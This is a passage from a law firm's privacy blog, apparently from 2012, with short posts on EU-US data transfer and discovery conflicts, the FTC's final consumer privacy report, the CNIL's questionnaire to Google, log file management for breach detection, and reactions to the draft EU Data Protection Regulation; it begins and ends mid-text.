Cynthia then discussed conflicting laws between the EU and US on cross-border discovery stemming from the international data transfer bar contained in the EU Data Protection Directive, and some European countries’ blocking statutes. Because of the broad definitions of ‘personal data’ and ‘processing’, any US discovery seeking documents from organizations located in Europe will be caught by national data protection laws so that a transfer of data to the United States has the potential to violate national data protection laws. Cynthia discussed recent trends such as the Sedona Conference Working Group 6 principles on transfers and the new American Bar Association’s decision urging US courts to give ‘due respect’ to foreign data protection and privacy, and the International Chamber of Commerce policy statement on “Cross-border law enforcement access to company data – current issues under data protection and privacy law”. The statement makes recommendations that can help to ensure respect for both law enforcement interests, and data protection and privacy laws.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

A joint US-EU Conference on Privacy and Protection of Personal Data took place in Washington, D.C. and Brussels in March and coincided with the release of a joint US-EU Privacy Statement.

Keynote speeches were delivered by Viviane Reding, the Vice-President of the European Commission; US Congressman Ed Markey (D-Mass.); and Julie Brill, Commissioner of the FTC. Each of the keynote speakers welcomed the cooperation between the EU and the US, and the potential to work together toward common standards.

Viviane Reding stated that solid protection was needed to gain user trust for a digital economy to flourish. She welcomed US activity in the area of data privacy, as there was potential for the EU and the US to work together on a “Gold Standard”, which would support the joint commitment made by President Obama and EU President Barroso during the November 2011 EU-US Summit.

Rep. Markey felt the US could learn a lot from the EU given that US citizens have the same concerns as EU citizens when it comes to data privacy, and that privacy and data protection are based on a key principle of “Knowledge, Notice and No” – people want to know what is happening, and they want options for control and the ability to say “no”. He believes that consumers should have control over their personal information. While the proposed EU Regulation sets a high bar for the US, Rep. Markey felt this was the right model for the US to follow. Rep. Markey highlighted the problems with online behavioural advertising, the risks to children, and the reasons for his introduction of the “Do Not Track Kids Act”.

Julie Brill urged the US and the EU to “shape the future of privacy”, and to focus on similarly based principles and underlying compatibility of their respective frameworks, such as providing effective tools for consumers and giving users access to data which is accurate and secure. She commented that the FTC is committed to “enforcement across borders” and noted that the FTC consent-orders relating to Google and Facebook protect users worldwide.

The discussions highlighted the differences in approach between the EU and the US, with EU’s draft Regulation seeking to create a single system across 27 member states which would cut red tape, reduce fragmentation and be good for business, and which had a common goal with the White House’s Consumer Privacy Bill of Rights, which seeks to also build on an existing framework. Most speakers agreed that there was little disagreement between the EU and US in relation to basic values, and David Vladeck of the FTC felt that Privacy by Design should be a basic pillar of both EU and US policy.

Baroness Sarah Ludford, a member of the EU Parliament, commented that the safe harbor framework was a good basis for increasing trust for transfers of data from the EU to US, and she was optimistic about developments between the US and the EU and the key similarities in proposed regulations even if the mechanisms are different. In the future, she hoped to see an umbrella agreement between the US and the EU which would provide a stable, permanent framework.

The recurring theme of the discussions was how far the EU and the US had come, and that the focus should be on common shared points rather than on differences. Interoperability was mentioned frequently by a number of participants, as well as the idea of harmonisation and global, flexible regulation. Speakers felt the EU and the US should work towards elements such as common principles, common implementation and common enforcement, including the imposition of high sanctions and fines which are vital to successful enforcement.

The US-EU Joint Statement on Privacy seeks to work towards a consensus on how to take emerging privacy issues in line with the objectives of increasing trade and regulatory cooperation, and the US and EU each reaffirmed their commitment to the US-EU Safe Harbor Framework.

A full programme of the conference can be found here.

• Print
• Comments
• Trackbacks
• Share Link

Firewall, server and application log alerts can be used as real-time intelligence, but these alerts often go ignored. Even if some log alerts are investigated, many organizations often are unaware of the information they retain and how logs may be mined in the event of a data breach. It's a privacy and security sin, but it is understandable given the vast trove of logs available to most enterprise organizations. So, why should your organization care about log files? Because they are essential warning tools and ultimate evidence in the event of a data breach. Hackers and inside intruders leave their fingerprints all over log files. Piecing together these bits of evidence in real-time can help your organization detect preliminary intrusions and, if the big breach does occur, quickly understand the universe of information available for your IT forensics teams.

In the event of a data breach, law enforcement, regulators, payment card auditors, clients and others will ask about your log file management and your alerting protocols. Don't be caught unaware.

To develop an appropriate log file management program, companies should: (1) craft written policies for logging, auditing, and handling logs; (2) employ tools to collate, index, and normalize logs for analysis; (3) define and generate alerts and actions for critical events (without overly alerting and desensitizing staff); and (4) set discernable metrics for management review. The goal from this process is to retain sufficient data for the investigatory process in the event of a data security breach, and then to purge stale log file data in accordance with the organization's data privacy mandates. Understanding your log file program for critical systems, network components and virtualized environments is a must. Then, you must communicate the log file program with key business owners, so they understand any limitations of your existing systems and support technology improvements, if they are necessary. Reed Smith recently hosted a series of meetings on this topic in its Washington, D.C., New York, Pittsburgh and Philadelphia offices with the CISO Executive Network, entitled, “Security Operations with a special focus on Event and Log Management.” Please click here for a recorded video conference of Amy Mushahwar presenting to the Washington, D.C. CISO Executive Network.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Paul Bond, Christopher G. Cwalina, Amy S. Mushahwar, Frederick Lah, and Christine E. Nielsen.

This week, the Federal Trade Commission (FTC) released its long-awaited final Commission Consumer Privacy Report, entitled “Protecting Consumer Privacy in an Era of Rapid Change” (“Final Report”). The FTC emphasizes that the report only sets forth industry best practices and was “not intended” to serve as a new template for enforcement. However, this line is not exactly clear as the FTC identifies existing law and enforcement actions that form the basis of its advice (and could be the basis for Section 5 enforcement actions).

The Final Report expands on a preliminary FTC staff report issued in December 2010 and is consistent with the Department of Commerce’s (DOC) parallel privacy initiative. The Final Report calls on companies to do the following:

• Engage in Privacy by Design: Companies should build in privacy protections – including data security, data minimization, focused data retention and data hygiene – at every stage in product development (from conceptualization to end-of-lifecycle).
• Provide Simplified Choice: Companies should give consumers the ability to make choices about their data collection and use “at a relevant time and context,” including developing more automated choice functions like a “Do Not Track” mechanism.
• Exhibit Greater Transparency: Companies should make their data practices more “consumer friendly” and accessible by streamlining privacy policies, providing consumers with access to data collected about them, and engaging in consumer education campaigns to promote information-age literacy.

The framework applies to all businesses that collect or use consumer data that can be “reasonably linked to a specific consumer, computer, or other device, unless the entity collects only non sensitive data from fewer than 5,000 consumers per year and does not share the data with third parties.” Notably, the framework, also applies to offline or paper data. Data that has been de-identified is exempt.

The FTC also calls on Congress to develop baseline privacy legislation. To this end, FTC Chairman John Liebowitz and DOC will be testifying Thursday, March 29, 2012, before the House Energy and Commerce Subcommittee on Commerce, Manufacturing and Trade to advance the legislative agenda. The hearing notice and Committee background memo are available here.

Over the next year, the FTC will focus on encouraging voluntary adoption of further privacy protections and be active in five main areas:

• “Do Not Track” Browser Standard: While the FTC commends the progress made by the Digital Advertising Alliance (DAA) in developing an icon-based system for self-regulation of the online advertising industry, they say that more work needs to be done. The DAA, Internet browser companies, the FTC and the DOC have publicly committed to implementing the existing DAA self-regulatory standard in a browser-based automated privacy tool that will help consumers persistently opt-out of online behavioral advertising and multi-site advertising.
• Mobile Data: On the heels of the FTC Mobile Children’s Privacy Report, the FTC continues to urge all companies offering mobile services to improve privacy disclosures. In that vein, the FTC will host a web-disclosure workshop including some mobile privacy discussions May 30, 2012, to address how mobile privacy disclosures may be streamlined for mobile screen viewing.
• Data Brokers Disclosure & Consumer Data Access: The FTC asks data brokers (those collecting information on consumers where they do not have a consumer-facing relationship) to create a centralized website where they would: (1) identify themselves to consumers and describe how they collect and use consumer data and (2) detail the access rights and data choice they provide with the data that they maintain.
• Large Platform Providers: The FTC suggested that large platform providers, businesses such as ISPs, operating systems, browsers and social media companies that seek to comprehensively track consumers’ online activities, raise elevated privacy concerns. This heightened concern regarding multi-platform tracking is best exhibited in the FTC’s and state regulators concerns regarding the streamlined Google privacy policy. FTC staff intends to host a public workshop on this topic in Q3 of this year.
• Commerce’s Development of Enforceable Self Regulatory Codes: The DOC is in the process of developing sector-specific codes of conduct. FTC staff has indicated that it will participate in this process, and if strong privacy codes are developed in the Commerce process, the Commission will view adherence to such codes favorably when it is reviewing company practices under a Section 5 action.

Please click here to view additional information from the Reed Smith Teleseminar "FTC Issues Final Commission Report on Consumer Privacy: Agency Calls on Companies to Develop Privacy Best Practices."

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Mark Melodia, John Hines, and Frederick Lah.

We wanted to follow up on a previous post we wrote about whether there is such a thing as "public privacy" -- the concept that people should be entitled to at least some expectation that their actions, even if done in public, will not be widely publicized on a site like YouTube. We continue to see cases develop in this area, particularly in the law enforcement context.

In the following client alert, we take a closer look at this notion of "public privacy."

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Daniel Kadar.

Google’s CEO, Larry Page, now belongs to the happy few who enjoy direct and regular contact with the CNIL’s president, Mrs. Falque-Pierrotin: he received on 19 March another letter from the French Data Protection Authority’s president pursuant to Google’s decision to launch its new integrated platform 1 March, despite the CNIL’s strong warning to postpone it.

This platform now integrates, in particular, services such as Google Search, Google+, YouTube, Analytics, DoubleClick, +1, Google Location Services and Google Android-based software.

Pursuant to the CNIL’s announcement, this second letter – which is again publicised on the CNIL’s website – contains a 12-page questionnaire divided into not less than 69 main questions on Google’s new privacy policy.

The CNIL outlines in its cover letter that the questionnaire was elaborated in collaboration with the other European DPAs within the Working Party 29.

Whilst the CNIL previously expressed serious doubts about the compliance of the said policy with the European Data Protection Directive (95/46/CE), questions such as “Please provide the legal basis for the combination of data across different services, with respect to article 7 of the Data Protection Directive (95/46/CE)” (Question No. 32) no longer show such doubts concerning the response.

The CNIL focuses on several issues in its questionnaire:

• The transition to the new privacy policy, in order to verify how and how many users were informed of it
• The services proposed as well as the collected data: in both regards, the CNIL asks for a list of the services concerned by the integrated platform, and for the different data categories concerned
• The purposes of the processing, in particular how “more relevant search results and ads” are provided to the users
• The new data retention policy
• The data owner’s rights and consent, which is obviously a major source of concern:
  • How is the “explicit consent” of the users obtained by Google? In particular, did Google request an explicit consent from users having a Google account before the transition?
  • Why did Google remove the opt-out option given to users in its previous privacy policies for the combination of information and for other services in general?
  • How is the opt-in option given to users for personally identifiable information monitored, and which data does such option cover?
  • How is the user’s consent obtained for cookies?
  • How is the user’s right to oppose organized and granted?
  • How can the user opt out from personalized advertising? The CNIL provided a detailed and comprehensive schedule based on the different kinds of personalised ads (deriving from queries, site visits, clicks, etc.) and depending on the user category: passive, non-authenticated and authenticated user. Google is requested to complete this schedule and provide explanations for each kind of personalised ads.
• The Terms of Service of the new policy: the CNIL asks in particular how these Terms of Service apply to personal data uploaded by users
• The legitimacy of data connection between services, in which the CNIL directly asks for the legal basis on the grounds of which Google proceeds to such connection (!)
• The user’s information in general, including concerning the use of mobile android platforms

The CNIL gave Google until 5 April to respond to its questionnaire. The cover letter mentions that the CNIL “encourages” Google “to provide detailed and specific answers to each question”, concluding, not without a strong sense of irony, that Google’s responses will be treated confidentially, unless Google authorizes the CNIL to publicise them…

The length of the CNIL’s questionnaire and the general tone of the questions are strong indicators for the seriousness of the CNIL’s analysis, and its willingness to obtain that the first major “intelligent advertisement” system complies with applicable data privacy regulation.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue and Zack Dong.

New regulations governing the activities of Internet Information Service Providers (“IISPs”) unveiled
by the Chinese Ministry of Industry and Information Technology (“CMIIT”) in December came into
force on 15 March. The “Several Provisions on Regulation of the Market Order of Internet Information Services” (“Provisions”) aim to enhance the protections available to Internet users in China in areas such as Internet security, data protection and online advertising.

For a more detailed analysis, please click here.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Nancy E. Bonifant and Brad M. Rostolsky.

On March 13, 2012 the Department of Health and Human Services (HHS), Office of Civil Rights (OCR) announced its settlement with Blue Cross Blue Shield of Tennessee (BCBST), marking the first enforcement action resulting from a breach self-report required by HITECH’s Breach Notification Rule.

For a more detailed analysis, please click here.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

On 23 and 24 February 2012, the General Secretariat to the EU presented the proposed Data Protection Regulation to the EU Working Party on Information Exchange and Data Protection (DAPIX), stating that the new proposals were motivated by the European Commission’s (EC) desire to stimulate growth across the EU and the need to protect the fundamental rights of European citizens. The EC’s justification for the proposed overhaul of existing European data privacy legislation was triggered by technological developments that have taken place since the 1995 EU Data Protection Directive, and the global trend towards a digital economy.

In addition, the General Secretariat distributed to the delegates a comparative table of the first 21 articles of the draft General Data Protection Regulation against the 1995 Directive.

The EC set out four key objectives underlying the proposal for a Data Protection Regulation: (1) stimulation of growth through the uniform application of data protection rules across the EU; (2) protection of fundamental rights; (3) adoption of flexible legal instruments capable of adapting to future technologies; and (4) legal certainty.

A summary of the discussions was published on 8 March 2012. Delegates of the DAPIX raised various issues with the draft Regulation, including that the Commission could have been more radical in its proposals. In contrast, many of the DAPIX delegates raised serious concerns about the draft Regulation, fearing that it would increase the administrative burden on organizations and public authorities.

Concerns were raised about obligations on small and medium-sized businesses, the specific obligation on organizations with more than 250 employees to appoint a data protection officer, and rules applicable to individuals rather than utilizing a more risk-based approach.

DAPIX also reviewed the proposed legislative instruments of a Regulation and Directive on data protection in law enforcement, with some of the delegates stating they would have preferred another directive on the basis that a regulation could be too prescriptive.

DAPIX also criticized the delegated powers of the EC under the draft Regulation on the basis that there was an unbalanced division of power between the legislator (the European Council and Parliament) and the EC, which could undermine the desire to simplify data protection rules, and that such delegated acts could lead to modification of the EU Member States’ national legislation.

The delegates also raised strong reservations surrounding the geographical scope concerning the ‘one-stop shop’ principle that makes one Data Processing Authority (DPA) competent for all data processing operations throughout the EU, fearing that organizations would then forum shop, and that it would create an excessive administrative burden on some national DPAs. Other delegates, however, welcomed the ‘one-stop shop’ principle.

Delegates raised additional concerns about whether the draft Regulation is sufficiently technology-neutral, and whether concepts such as the right to be forgotten and the right to data portability were technically feasible, as well as the possible overlap with the e-Privacy Directive.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The ICO has published its initial analysis of the European Commission’s reform of the EU Data Protection Directive 95/46/EC ("the Directive"). The ICO published its review of the draft Data Protection Regulation and the Directive on data protection in law enforcement ("DP Framework") on 25 January 2012, but was quick to stress that its review is not a comprehensive analysis, nor will it be the ICO’s last word on the subject.

The ICO views the Commission’s proposals as a “positive contribution” towards updating data protection law in light of the current “patchwork” national laws, and because the existing Directive is “out-of-date”. The ICO, however, would prefer a single comprehensive instrument to the two documents contained in the DP Framework. If two instruments do remain, then the ICO would like to see the EU Parliament ensure as much consistency as possible between them; otherwise, there could be a lack of consistency, which would undermine one of the European Commission’s objectives for revising the existing Directive.

The ICO points to the following concerns:

• Consistency, while welcome, may never be truly possible because of the variations between different member states
• The drive for harmonisation could become a burden on businesses and lead to complexity for individuals
• The DP Framework is more detailed and prescriptive than the Directive and a result could be onerous or disproportionate, whereas a flexible instrument may be more suitable

The ICO reviewed a selection of the 91 articles of the proposed EU DP Regulation, praising the expanded definitions of "